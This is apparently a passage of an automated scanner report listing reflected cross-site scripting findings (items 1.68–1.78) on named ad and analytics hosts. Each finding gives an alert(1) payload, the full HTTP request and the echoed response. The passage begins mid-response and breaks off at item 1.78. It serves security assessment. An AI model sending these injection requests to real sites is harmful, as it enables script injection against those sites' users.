User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 779
Date: Sun, 20 Mar 2011 13:31:19 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/177/*/n;237863701;0-0;1;40342997;4307-300/250;41068870/41086657/1;u=rmxli_2904721|surl_http://buzzya.com/category/
...[SNIP]...
ACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAyrtg0y4BAAAAAAAAADA1YjY2ZTYyLTUyZjMtMTFlMC1iYTA0LTAwMzA0OGQ2ZDA2NgA4nyoAAAA=,,http://buzzya.com/category/sports/,&da7ef';alert(1)//63799f412da=1http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-1?mpt=3952788">
...[SNIP]...

1.68. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-2 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-2

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1221e'-alert(1)-'f7efe862d14 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-2?mpt=20086321221e'-alert(1)-'f7efe862d14&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/1ca/%2a/a%3B237863703%3B0-0%3B1%3B40342997%3B3454-728/90%3B41068898/41086685/1%3Bu%3Drmxli_2904795|surl_http%3A//rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D|pr_0.3500|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B2e75bab3029d4c42%3B12ed3431171,0%3B%3B%3B2825860846,NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D, HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACfI8Gb.tjOCUrprrxPD33NNXpvaMrAs.Da0NhMAAAAAA==,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,Z%3D728x90%26s%3D1602587%26_salt%3D225907243%26B%3D10%26u%3Dhttp%253A%252F%252Frotator.adjuggler.com%252Fservlet%252Fajrotator%252F1007517%252F0%252Fvh%253Fz%253Dpdn%2526dim%253D753181%2526pos%253D7%2526kw%253D%2526click%253D%26r%3D0,7e71c7d4-52ee-11e0-ae4c-003048d6d3ac
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:9866/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 4:34:51 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 892
Date: Sun, 20 Mar 2011 13:02:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/1ca/*/a;237863703;0-0;1;40342997;3454-728/90;41068898/41086685/1;u=rmxli_2904795|surl_http://rotator.adjuggler.com
...[SNIP]...
MTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http://rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh?z=pdn&dim=753181&pos=7&kw=&click=,http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-2?mpt=20086321221e'-alert(1)-'f7efe862d14">
...[SNIP]...

1.69. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-2 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-2

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd39b'%3balert(1)//b42108c1395 was submitted in the mpvc parameter. This input was echoed as fd39b';alert(1)//b42108c1395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-2?mpt=2008632&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/1ca/%2a/a%3B237863703%3B0-0%3B1%3B40342997%3B3454-728/90%3B41068898/41086685/1%3Bu%3Drmxli_2904795|surl_http%3A//rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D|pr_0.3500|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B2e75bab3029d4c42%3B12ed3431171,0%3B%3B%3B2825860846,NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,fd39b'%3balert(1)//b42108c1395 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACfI8Gb.tjOCUrprrxPD33NNXpvaMrAs.Da0NhMAAAAAA==,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,Z%3D728x90%26s%3D1602587%26_salt%3D225907243%26B%3D10%26u%3Dhttp%253A%252F%252Frotator.adjuggler.com%252Fservlet%252Fajrotator%252F1007517%252F0%252Fvh%253Fz%253Dpdn%2526dim%253D753181%2526pos%253D7%2526kw%253D%2526click%253D%26r%3D0,7e71c7d4-52ee-11e0-ae4c-003048d6d3ac
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:9866/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 4:53:35 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 892
Date: Sun, 20 Mar 2011 13:03:25 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/1ca/*/a;237863703;0-0;1;40342997;3454-728/90;41068898/41086685/1;u=rmxli_2904795|surl_http://rotator.adjuggler.com
...[SNIP]...
AAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http://rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh?z=pdn&dim=753181&pos=7&kw=&click=,fd39b';alert(1)//b42108c1395http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-2?mpt=2008632">
...[SNIP]...

1.70. http://altfarm.mediaplex.com/ad/js/1551-47634-23636-2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/1551-47634-23636-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 176c0'%3balert(1)//8ef6539d756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 176c0';alert(1)//8ef6539d756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/1551-47634-23636-2?mpt=2008632&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/17/1ca/%2a/a%3B237863703%3B0-0%3B1%3B40342997%3B3454-728/90%3B41068898/41086685/1%3Bu%3Drmxli_2904795|surl_http%3A//rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D|pr_0.3500|pid_298720%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3B2e75bab3029d4c42%3B12ed3431171,0%3B%3B%3B2825860846,NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,&176c0'%3balert(1)//8ef6539d756=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACfI8Gb.tjOCUrprrxPD33NNXpvaMrAs.Da0NhMAAAAAA==,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,Z%3D728x90%26s%3D1602587%26_salt%3D225907243%26B%3D10%26u%3Dhttp%253A%252F%252Frotator.adjuggler.com%252Fservlet%252Fajrotator%252F1007517%252F0%252Fvh%253Fz%253Dpdn%2526dim%253D753181%2526pos%253D7%2526kw%253D%2526click%253D%26r%3D0,7e71c7d4-52ee-11e0-ae4c-003048d6d3ac
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:9866/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:23636/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534; expires=Wed, 20-Mar-2013 4:44:04 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 895
Date: Sun, 20 Mar 2011 13:04:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/17/1ca/*/a;237863703;0-0;1;40342997;3454-728/90;41068898/41086685/1;u=rmxli_2904795|surl_http://rotator.adjuggler.com
...[SNIP]...
AAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http://rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh?z=pdn&dim=753181&pos=7&kw=&click=,&176c0';alert(1)//8ef6539d756=1http://altfarm.mediaplex.com/ad/ck/1551-47634-23636-2?mpt=2008632">
...[SNIP]...

1.71. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ec470<script>alert(1)</script>3dc356ccb was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ec470<script>alert(1)</script>3dc356ccb&c2=6036034&c3=&c4=/home.jsp&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:16 GMT
Date: Sun, 20 Mar 2011 12:34:16 GMT
Connection: close
Content-Length: 3592

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2ec470<script>alert(1)</script>3dc356ccb", c2:"6036034", c3:"", c4:"/home.jsp", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});

1.72. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 2f9af<script>alert(1)</script>f146aed6507 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/home.jsp&c5=20000&c6=&c15=2f9af<script>alert(1)</script>f146aed6507 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:34 GMT
Date: Sun, 20 Mar 2011 12:34:34 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/home.jsp", c5:"20000", c6:"", c10:"", c15:"2f9af<script>alert(1)</script>f146aed6507", c16:"", r:""});

1.73. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 43b1f<script>alert(1)</script>16d002d648f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603603443b1f<script>alert(1)</script>16d002d648f&c3=&c4=/home.jsp&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:17 GMT
Date: Sun, 20 Mar 2011 12:34:17 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603603443b1f<script>alert(1)</script>16d002d648f", c3:"", c4:"/home.jsp", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});

1.74. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c785e<script>alert(1)</script>5716d4dfb63 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=c785e<script>alert(1)</script>5716d4dfb63&c4=/home.jsp&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:19 GMT
Date: Sun, 20 Mar 2011 12:34:19 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6036034", c3:"c785e<script>alert(1)</script>5716d4dfb63", c4:"/home.jsp", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});

1.75. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 590d4<script>alert(1)</script>3603f583bd3 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/home.jsp590d4<script>alert(1)</script>3603f583bd3&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:21 GMT
Date: Sun, 20 Mar 2011 12:34:21 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/home.jsp590d4<script>alert(1)</script>3603f583bd3", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});

1.76. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1ac4b<script>alert(1)</script>6ac56c9f0b8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/home.jsp&c5=200001ac4b<script>alert(1)</script>6ac56c9f0b8&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:30 GMT
Date: Sun, 20 Mar 2011 12:34:30 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/home.jsp", c5:"200001ac4b<script>alert(1)</script>6ac56c9f0b8", c6:"", c10:"", c15:"", c16:"", r:""});

1.77. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 44917<script>alert(1)</script>16cf6ca1a0d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/home.jsp&c5=20000&c6=44917<script>alert(1)</script>16cf6ca1a0d&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 27 Mar 2011 12:34:33 GMT
Date: Sun, 20 Mar 2011 12:34:33 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/home.jsp", c5:"20000", c6:"44917<script>alert(1)</script>16cf6ca1a0d", c10:"", c15:"", c16:"", r:""});

1.78. http://charmingshoppesinter.tt.omtrdc.net/m2/charmingshoppesinter/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
